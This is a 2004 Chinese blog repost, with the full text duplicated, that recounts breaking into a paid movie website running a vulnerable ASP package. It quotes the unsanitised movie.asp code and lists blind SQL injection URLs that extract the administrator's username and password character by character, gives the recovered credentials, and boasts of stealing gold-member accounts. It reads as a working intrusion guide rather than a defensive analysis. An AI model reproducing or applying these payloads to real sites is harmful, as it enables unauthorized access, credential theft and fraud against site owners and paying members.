简单入侵收费电影网站
2004-11-10 15:44
483 查看
今天在网上闲逛,发现一篇帖子不错,是关于怎样入侵免费电影网站的过程,其实程序实现起来很简单,是用ASP写的,相信学过ASP程序的朋友应该都能看懂,具体内容如下:
近日学习sql injection,下载金梅收费电影程序2003会员版看了一通, 发现movie.asp这个文件有问题:
dim sql
dim rs
articleid=request("id")
set rs=server.createobject("adodb.recordset")
sql="update learning set hits=hits+1 where articleID="&articleid
rs.open sql,conn,1,3
sql="select * from learning where articleid="&articleid
rs.open sql,conn,1,1
title=rs("title")
ittype=rs("typeid")
没有对变量做任何检查,那就别怪我了,呵呵,找了个目标网站,
我们开始测试管理员帐号的位数,因为保存管理员帐号的字段名为name,所以语句为:
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>4)
正常返回页面,由此我们可以知道管理员的帐号是大于4位的!
我们继续,
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>
"无法显示网页",出错了,由此我们可以知道管理员的帐号是大于等于8位的
我们再来,
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)=8)
正常返回页面,好极了,由此得出
name为8位
同样
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(pwd)=21)
正常返回页面
pwd为21位,TNND的,这么长!
不管了,我们接下来开始测试管理员的用户名
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>50)
正常返回页面,看来还不够大.
注:mid函数可以把密码分成若干部分取出,使用方法 mid(字符串,起始位,取出的字符串的长度)
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>100)
"无法显示页面",看来比100还小.
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))=100)
正常返回页面,于是我们可以得到管理员的用户名第一位的asc码为:100
通过查询asc码表可以得到,
name的第一位为:d
接下来顺利的得到了name=darkeyes^
然后我们开始测试pwd,呼,有21位啊,真是路漫漫其修远啊!:)
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))>100)
正常显示页面,再来
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))>110)
"无法显示页面",比110小哦,呵呵
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))=102)
正常显示页面,对了,得到
pwd的第一位为:f
最后顺利的得到了
pwd=xyfsdb7ew8y654231123d
找到管理页面,登录进去,拿了几个黄金会员的帐号,就去慢慢欣赏movies了,呵呵。
近日学习sql injection,下载金梅收费电影程序2003会员版看了一通, 发现movie.asp这个文件有问题:
dim sql
dim rs
articleid=request("id")
set rs=server.createobject("adodb.recordset")
sql="update learning set hits=hits+1 where articleID="&articleid
rs.open sql,conn,1,3
sql="select * from learning where articleid="&articleid
rs.open sql,conn,1,1
title=rs("title")
ittype=rs("typeid")
没有对变量做任何检查,那就别怪我了,呵呵,找了个目标网站,
我们开始测试管理员帐号的位数,因为保存管理员帐号的字段名为name,所以语句为:
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>4)
正常返回页面,由此我们可以知道管理员的帐号是大于4位的!
我们继续,
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>
"无法显示网页",出错了,由此我们可以知道管理员的帐号是大于等于8位的
我们再来,
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)=8)
正常返回页面,好极了,由此得出
name为8位
同样
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(pwd)=21)
正常返回页面
pwd为21位,TNND的,这么长!
不管了,我们接下来开始测试管理员的用户名
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>50)
正常返回页面,看来还不够大.
注:mid函数可以把密码分成若干部分取出,使用方法 mid(字符串,起始位,取出的字符串的长度)
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>100)
"无法显示页面",看来比100还小.
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))=100)
正常返回页面,于是我们可以得到管理员的用户名第一位的asc码为:100
通过查询asc码表可以得到,
name的第一位为:d
接下来顺利的得到了name=darkeyes^
然后我们开始测试pwd,呼,有21位啊,真是路漫漫其修远啊!:)
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))>100)
正常显示页面,再来
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))>110)
"无法显示页面",比110小哦,呵呵
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))=102)
正常显示页面,对了,得到
pwd的第一位为:f
最后顺利的得到了
pwd=xyfsdb7ew8y654231123d
找到管理页面,登录进去,拿了几个黄金会员的帐号,就去慢慢欣赏movies了,呵呵。
相关文章推荐
- 简单入侵收费电影网站!
- 入侵网站简单方法总结
- 简单网站入侵.工具:1.啊D注入 2.百度高级搜索
- 怎么简单快速一个钟头入侵网站
- nodejs+express搭建简单的电影网站之 express安装
- 简单通俗的由入侵反应如何加强网站及服务器部署
- 简单通俗的由入侵反应如何加强网站及服务器部署
- BT网站关了,正版电影数字发行在线收费下载 的机会?
- 像电影里黑客高手一样敲代码攻击入侵网站
- 狂汗!VOD点播系统漏洞解析,入侵电影网站!
- 像电影里黑客高手一样敲代码攻击入侵网站(模拟)
- node.js搭建一个简单的电影网站
- 网站收费不简单 创业者面临挑战
- Express,mysql,ejs搭建简单电影网站
- vbs模拟登陆、遍历,然后批量,调用迅雷下载某电影网站的资源
- 网站设计之常见简单实用的JavaScript特效总结(上篇)
- 简单口令入侵
- 安全防范:网站入侵过程全记录【图】 - [杀毒防范技巧]
- 话说“武汉真爱医院”负面信息被百度毫不留情的给收录了|网站入侵
- php网站制作(2)-thinkphp3.2.1简单框架学习